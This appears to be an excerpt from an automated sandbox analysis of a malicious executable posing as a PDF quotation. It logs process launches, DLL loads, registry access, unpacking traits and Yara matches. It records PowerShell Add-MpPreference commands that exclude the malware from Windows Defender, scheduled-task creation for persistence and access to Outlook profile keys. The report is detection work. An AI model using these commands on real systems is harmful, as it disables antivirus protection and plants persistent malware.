Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Source: C:\Users\user\AppData\Roaming\mexnJkivovwH.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\mexnJkivovwH" /XML "C:\Users\user\AppData\Local\Temp\tmp36D0.tmp"
Source: C:\Windows\SysWOW64\schtasks.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Roaming\mexnJkivovwH.exe	Process created: C:\Users\user\AppData\Roaming\mexnJkivovwH.exe "C:\Users\user\AppData\Roaming\mexnJkivovwH.exe"
Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Quotation2025-0107pdf.exe"	Jump to behavior
Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\mexnJkivovwH.exe"	Jump to behavior
Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\mexnJkivovwH" /XML "C:\Users\user\AppData\Local\Temp\tmp2404.tmp"	Jump to behavior
Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exe	Process created: C:\Users\user\Desktop\Quotation2025-0107pdf.exe "C:\Users\user\Desktop\Quotation2025-0107pdf.exe"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mexnJkivovwH.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\mexnJkivovwH" /XML "C:\Users\user\AppData\Local\Temp\tmp36D0.tmp"
Source: C:\Users\user\AppData\Roaming\mexnJkivovwH.exe	Process created: C:\Users\user\AppData\Roaming\mexnJkivovwH.exe "C:\Users\user\AppData\Roaming\mexnJkivovwH.exe"

Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exe	Section loaded: dwrite.dll	Jump to behavior
Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exe	Section loaded: vaultcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exe	Section loaded: samcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exe	Section loaded: samlib.dll	Jump to behavior
Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mexnJkivovwH.exe	Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Roaming\mexnJkivovwH.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Roaming\mexnJkivovwH.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Roaming\mexnJkivovwH.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Roaming\mexnJkivovwH.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Roaming\mexnJkivovwH.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\mexnJkivovwH.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\mexnJkivovwH.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Roaming\mexnJkivovwH.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Roaming\mexnJkivovwH.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Roaming\mexnJkivovwH.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Roaming\mexnJkivovwH.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Roaming\mexnJkivovwH.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Roaming\mexnJkivovwH.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Roaming\mexnJkivovwH.exe	Section loaded: dwrite.dll
Source: C:\Users\user\AppData\Roaming\mexnJkivovwH.exe	Section loaded: windowscodecs.dll
Source: C:\Users\user\AppData\Roaming\mexnJkivovwH.exe	Section loaded: amsi.dll
Source: C:\Users\user\AppData\Roaming\mexnJkivovwH.exe	Section loaded: userenv.dll
Source: C:\Users\user\AppData\Roaming\mexnJkivovwH.exe	Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Roaming\mexnJkivovwH.exe	Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Roaming\mexnJkivovwH.exe	Section loaded: textshaping.dll
Source: C:\Users\user\AppData\Roaming\mexnJkivovwH.exe	Section loaded: propsys.dll
Source: C:\Users\user\AppData\Roaming\mexnJkivovwH.exe	Section loaded: edputil.dll
Source: C:\Users\user\AppData\Roaming\mexnJkivovwH.exe	Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Roaming\mexnJkivovwH.exe	Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Roaming\mexnJkivovwH.exe	Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Roaming\mexnJkivovwH.exe	Section loaded: netutils.dll
Source: C:\Users\user\AppData\Roaming\mexnJkivovwH.exe	Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\AppData\Roaming\mexnJkivovwH.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Roaming\mexnJkivovwH.exe	Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Roaming\mexnJkivovwH.exe	Section loaded: appresolver.dll
Source: C:\Users\user\AppData\Roaming\mexnJkivovwH.exe	Section loaded: bcp47langs.dll
Source: C:\Users\user\AppData\Roaming\mexnJkivovwH.exe	Section loaded: slc.dll
Source: C:\Users\user\AppData\Roaming\mexnJkivovwH.exe	Section loaded: sppc.dll
Source: C:\Users\user\AppData\Roaming\mexnJkivovwH.exe	Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\AppData\Roaming\mexnJkivovwH.exe	Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: fastprox.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: ncobjapi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: mpclient.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: version.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wmitomi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: mi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: miutils.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: miutils.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: taskschd.dll
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Roaming\mexnJkivovwH.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Roaming\mexnJkivovwH.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Roaming\mexnJkivovwH.exe	Section loaded: cryptbase.dll

Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook

Jump to behavior

Source: Quotation2025-0107pdf.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: Quotation2025-0107pdf.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Data Obfuscation

Detected unpacking (changes PE section rights)

Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exe

Unpacked PE file: 0.2.Quotation2025-0107pdf.exe.ce0000.0.unpack .text:ER;.rsrc:R;.reloc:R; vs Unknown_Section0:ER;Unknown_Section1:R;Unknown_Section2:R;

Detected unpacking (overwrites its own PE header)

Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exe

Unpacked PE file: 0.2.Quotation2025-0107pdf.exe.ce0000.0.unpack

.NET source code contains method to dynamically call methods (often used by packers)

Source: 0.2.Quotation2025-0107pdf.exe.4b08eb0.2.raw.unpack, DlRvq5yJkomY4LIf3S.cs	.Net Code: X2WPMWey8AqqJOPa61l(typeof(Marshal).TypeHandle).GetMethod("GetDelegateForFunctionPointer", new Type[2]{X2WPMWey8AqqJOPa61l(typeof(IntPtr).TypeHandle),typeof(Type)})
Source: 0.2.Quotation2025-0107pdf.exe.9a00000.6.raw.unpack, DlRvq5yJkomY4LIf3S.cs	.Net Code: X2WPMWey8AqqJOPa61l(typeof(Marshal).TypeHandle).GetMethod("GetDelegateForFunctionPointer", new Type[2]{X2WPMWey8AqqJOPa61l(typeof(IntPtr).TypeHandle),typeof(Type)})
Source: 0.2.Quotation2025-0107pdf.exe.4ae8e90.5.raw.unpack, DlRvq5yJkomY4LIf3S.cs	.Net Code: X2WPMWey8AqqJOPa61l(typeof(Marshal).TypeHandle).GetMethod("GetDelegateForFunctionPointer", new Type[2]{X2WPMWey8AqqJOPa61l(typeof(IntPtr).TypeHandle),typeof(Type)})
Source: 9.2.mexnJkivovwH.exe.3cea8a0.4.raw.unpack, DlRvq5yJkomY4LIf3S.cs	.Net Code: X2WPMWey8AqqJOPa61l(typeof(Marshal).TypeHandle).GetMethod("GetDelegateForFunctionPointer", new Type[2]{X2WPMWey8AqqJOPa61l(typeof(IntPtr).TypeHandle),typeof(Type)})
Source: 9.2.mexnJkivovwH.exe.3cca880.3.raw.unpack, DlRvq5yJkomY4LIf3S.cs	.Net Code: X2WPMWey8AqqJOPa61l(typeof(Marshal).TypeHandle).GetMethod("GetDelegateForFunctionPointer", new Type[2]{X2WPMWey8AqqJOPa61l(typeof(IntPtr).TypeHandle),typeof(Type)})

.NET source code contains potential unpacker

Source: 0.2.Quotation2025-0107pdf.exe.d390000.7.raw.unpack, mndwbrCbxIcjOGXSCv.cs	.Net Code: TT4NxstdUO System.Reflection.Assembly.Load(byte[])
Source: 0.2.Quotation2025-0107pdf.exe.4d3bea8.4.raw.unpack, mndwbrCbxIcjOGXSCv.cs	.Net Code: TT4NxstdUO System.Reflection.Assembly.Load(byte[])
Source: 0.2.Quotation2025-0107pdf.exe.4cdd688.3.raw.unpack, mndwbrCbxIcjOGXSCv.cs	.Net Code: TT4NxstdUO System.Reflection.Assembly.Load(byte[])

Yara detected aPLib compressed binary

Source: Yara match	File source: 0.2.Quotation2025-0107pdf.exe.4db46e8.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.mexnJkivovwH.exe.3ebf078.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.mexnJkivovwH.exe.3c45590.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.mexnJkivovwH.exe.3c45590.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.mexnJkivovwH.exe.3ebf078.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.mexnJkivovwH.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Quotation2025-0107pdf.exe.4db46e8.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.mexnJkivovwH.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Quotation2025-0107pdf.exe.4d3bea8.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Quotation2025-0107pdf.exe.4cdd688.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Quotation2025-0107pdf.exe.4b08eb0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.1714510226.0000000004DB4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.1742337265.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.1749098659.000000000245E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.1751386297.0000000003C45000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1713091318.00000000035D8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.1751386297.0000000003D1E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1714510226.0000000004B08000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Quotation2025-0107pdf.exe PID: 7332, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: mexnJkivovwH.exe PID: 7908, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: mexnJkivovwH.exe PID: 8124, type: MEMORYSTR

Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exe	Code function: 0_2_018C6F63 push edx; iretd	0_2_018C6F64
Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exe	Code function: 0_2_018C6A59 push DEFFFFFEh; retf	0_2_018C6A5E
Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exe	Code function: 0_2_0A1B6815 pushad ; iretd	0_2_0A1B6817
Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exe	Code function: 0_2_0A1B682A pushad ; iretd	0_2_0A1B682B
Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exe	Code function: 0_2_0A1B89DC pushad ; iretd	0_2_0A1B89DD
Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exe	Code function: 0_2_0A1B3FA7 pushfd ; iretd	0_2_0A1B3FA8
